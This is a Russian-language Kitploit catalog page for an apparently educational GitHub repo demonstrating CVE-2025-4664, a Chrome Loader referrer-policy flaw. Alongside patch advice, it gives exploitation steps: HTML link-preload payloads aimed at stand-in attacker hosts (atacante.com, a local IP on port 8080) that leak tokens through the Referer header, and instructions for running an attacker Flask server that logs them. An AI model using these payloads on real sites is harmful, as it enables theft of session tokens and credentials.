Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-4664 — Образовательная демонстрация CVE-2025-4664, уязвимости Chrome Loader, позволяющей осуществлять утечку данных между источниками через манипуляцию заголовком referrer-policy. Включает HTML-страницу жертвы и сервер Flask атакующего для практического моделирования эксплуатации. | Kitploit
Инструменты/GitHubGitHub/speinador/cve-2025-4664
Анализ уязвимостейЭксплуатацияСбор информацииФишингВеб-безопасностьОбучение и Образование
GitHubspeinador/cve-2025-4664

CVE-2025-4664

Образовательная демонстрация CVE-2025-4664, уязвимости Chrome Loader, позволяющей осуществлять утечку данных между источниками через манипуляцию заголовком referrer-policy. Включает HTML-страницу жертвы и сервер Flask атакующего для практического моделирования эксплуатации.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔒 Уязвимость CVE-2025-4664

Уязвимость CVE-2025-4664 — это ошибка безопасности высокой степени серьезности, выявленная в компоненте Loader браузера Google Chrome в версиях до 136.0.7103.113. Данная проблема позволяет удаленному злоумышленнику утекать данные из другого источника с помощью специально созданной HTML-страницы, что может привести к компрометации конфиденциальной информации, такой как токены сессий или учетные данные для аутентификации.


❓ В чем заключается уязвимость?

Ошибка заключается в некорректной реализации политик безопасности в компоненте Loader Chrome. В частности, Chrome интерпретирует директиву referrer-policy внутри HTTP-заголовка Link в запросах подресурсов (таких как изображения или скрипты), в то время как другие браузеры этого не делают. Злоумышленник может использовать это, установив менее строгую политику, например unsafe-url, что приводит к тому, что Chrome передает полные URL, включая конфиденциальные параметры, на домены, контролируемые злоумышленником.


⚠️ Воздействие и активная эксплуатация

Эта уязвимость активно эксплуатировалась в реальных условиях, что побудило Агентство по кибербезопасности и безопасности инфраструктуры США (CISA) включить ее в свой каталог известных и используемых уязвимостей (KEV). CISA установила 5 июня 2025 года крайним сроком для федеральных агентств по применению соответствующих исправлений.


🛡️ Меры по смягчению и рекомендации

Google выпустил обновления для исправления этой уязвимости в следующих версиях:

  • 🖥️ Windows и Mac: 136.0.7103.113/.114
  • 🐧 Linux: 136.0.7103.113

Настоятельно рекомендуется всем пользователям обновить свой браузер Chrome до последней доступной версии. Чтобы проверить и применить обновление:

  1. 🔍 Откройте Chrome и нажмите на меню из трех точек в правом верхнем углу.
  2. ⚙️ Выберите «Справка» и затем «О Google Chrome».
  3. ⬇️ Chrome автоматически проверит наличие обновлений и установит их, если они доступны.
  4. 🔄 После обновления перезапустите браузер для применения изменений.

Кроме того, пользователи браузеров на основе Chromium, таких как Microsoft Edge, Brave, Opera и Vivaldi, должны следить за соответствующими обновлениями, так как они также могут быть подвержены этой уязвимости.

Поддержание браузера в актуальном состоянии необходимо для защиты от активных угроз безопасности и сохранения личной информации.


🕵️‍♂️ Как происходит эксплуатация?

Уязвимость CVE-2025-4664 эксплуатируется путем манипуляции тем, как Google Chrome обрабатывает политику реферера (referrer-policy) при загрузке подресурсов (таких как изображения, скрипты и т.д.) из HTML-ссылок.


⚙️ Технические детали эксплуатации:

  1. 🌐 Создание вредоносного сайта:
    Злоумышленник создает веб-сайт, который включает в свой HTTP-заголовок HTML-ссылку, подобную этой:

    root@kitploit:~
    <link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
    
  2. 🔧 Манипуляция referrer-policy: В большинстве браузеров эта referrer-policy в теге не применяется к загружаемому ресурсу. Однако Chrome применяет её, что и является основной проблемой.

  3. 📤 Утечка Referer: Когда браузер жертвы (Chrome) загружает ресурс с victima.com, он отправляет полный URL исходного сайта в заголовке Referer, который может включать:

    • Токены сессии (?token=ABC123)
    • Конфиденциальные параметры (?user=admin&password=1234)
    • Приватные URL
  4. 🎯 Получение на сервере злоумышленника: Злоумышленник может указать в качестве назначения ресурса URL под своим контролем, например:

    root@kitploit:~
    <link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">
    

    Когда жертва обращается к этому ресурсу, Chrome отправляет полный URL жертвы в качестве Referer на сервер злоумышленника.

  5. 🕵️ Кража информации: Сервер злоумышленника регистрирует HTTP-заголовки и получает полное содержимое URL жертвы. Это может включать конфиденциальные данные, токены доступа или даже URL внутренних API.

✔️ Необходимые условия для срабатывания:

  • 👤 Жертва использует Google Chrome без обновления.
  • 🔑 Сайт жертвы содержит конфиденциальную информацию в URL (например, токены аутентификации).
  • 🎣 Злоумышленник добивается, чтобы браузер жертвы загрузил ресурс с его домена (например, с помощью фишинга, вредоносной рекламы или перенаправления).

🧪 Практический пример атаки (упрощённо):

  1. Злоумышленник отправляет жертве ссылку на:
root@kitploit:~
https://atacante.com/pagina-maliciosa.html
  1. На этой странице загружается что-то вроде:
root@kitploit:~
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
  1. Браузер Chrome отправляет:
root@kitploit:~
Referer: https://victima.com/perfil?token=ABC123

на домен атакующего, раскрывая токен.

Фото профиля

Файлы проекта

🖥️ index.html — Файл жертвы

Этот файл имитирует жертву атаки, это упрощенная HTML-демонстрация, показывающая, как можно эксплуатировать уязвимость CVE-2025-4664 с помощью вредоносного тега :

  • Представляет уязвимый интерфейс.
  • Используется для демонстрации того, как работает уязвимость в контролируемой среде.
  • Содержит элементы, которые может эксплуатировать злоумышленник в соответствии с CVE-2025-4664.
root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Этот ресурс указывает на сайт жертвы с конфиденциальной информацией в URL -->
  <link rel="preload" as="image"
        href="https://victima.com/perfil?token=ABC123"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Демонстрация уязвимости CVE-2025-4664</h1>
  <p>Если вы используете уязвимую версию Chrome, браузер отправит <strong>полный Referer</strong> на указанный выше URL.</p>
</body>
</html>

Что делает этот код:

  • Тег настроен на предварительную загрузку изображения с victima.com с токеном в URL.
  • С помощью referrerpolicy="unsafe-url" Chrome отправит полный URL текущей страницы в качестве Referer на домен жертвы.
  • Злоумышленник может захватить этот полный URL в своих логах, если изображение указывает на его собственный сервер.

🐍 servidor_atacante.py — Файл атакующего

С помощью этого скрипта можно автоматизировать атаку для захвата Referer, используя небольшой сервер на Python. Вот пример с использованием Flask для имитации сервера атакующего, который принимает данные:

  • Имитирует атаку на жертву, представленную index.html.
  • Реализует техники, описанные в уязвимости.
  • Используется для тестирования и проверки внедрённых мер защиты.

Как использовать:

  1. Сохраните этот код как servidor_atacante.py.
  2. Установите Flask, если он не установлен:
root@kitploit:~
pip install flask
  1. Запустите сервер:
root@kitploit:~
python servidor_atacante.py
  1. Затем измените HTML-демонстрацию следующим образом:
root@kitploit:~
<link rel="preload" as="image"
      href="http://<tu_IP>:8080/captura.jpg"
      referrerpolicy="unsafe-url">

Замените <tu_IP> на публичный или локальный IP-адрес сервера, на котором выполняется скрипт.


💪 Как использовать проект

🛠️ 1. Запустить сервер Flask

  1. Откройте терминал (PowerShell или CMD).

  2. Перейдите в папку с файлом:

root@kitploit:~
cd "C:\Users\Sebas\Desktop\servidor_atacante"
  1. Запустите Flask:
root@kitploit:~
python servidor_atacante.py
  1. Вы увидите что-то вроде:
root@kitploit:~
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080

🌐 2. Создать и открыть index.html (имитация жертвы)

В той же папке (C:\Users\Sebas\Desktop\servidor_atacante) создайте файл с именем index.html и следующим содержимым:

root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Имитация атаки -->
  <link rel="preload" as="image"
        href="http://192.168.1.35:8080/captura.jpg"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Симуляция CVE-2025-4664</h1>
  <p>Этот HTML пытается отправить полный URL (включая токен) злоумышленнику.</p>
</body>
</html>

✅ Важно: Убедитесь, что IP (192.168.1.35) совпадает с тем, который показывает Flask как локальный IP. Если он отличается, измените его в HTML.

🚀 3. Открыть index.html с конфиденциальным параметром

  1. Откройте Chrome.

  2. В адресной строке введите:

root@kitploit:~
file:///C:/[Папка назначения]/servidor_atacante/index.html?token=ABC123
  1. Нажмите Enter.

  2. 📥 Посмотреть результат на сервере В консоли Flask вы должны увидеть что-то вроде:

root@kitploit:~
[+] Referer получен: file:///C:/[Папка назначения]/servidor_atacante/index.html?token=ABC123

[Папка назначения]: Измените этот параметр на путь, где сохранен файл.

🎯 Это означает, что браузер отправил полный Referer злоумышленнику!


🧑‍🏫 Автор

Объяснение подготовлено Sebastian Peinador для учебных целей и исследований в области атакующей кибербезопасности.


📄 Лицензия

Этот материал распространяется под лицензией MIT.


Если это оказалось полезным, не забудьте поставить ⭐ репозиторию или поделиться им!

Скачать инструмент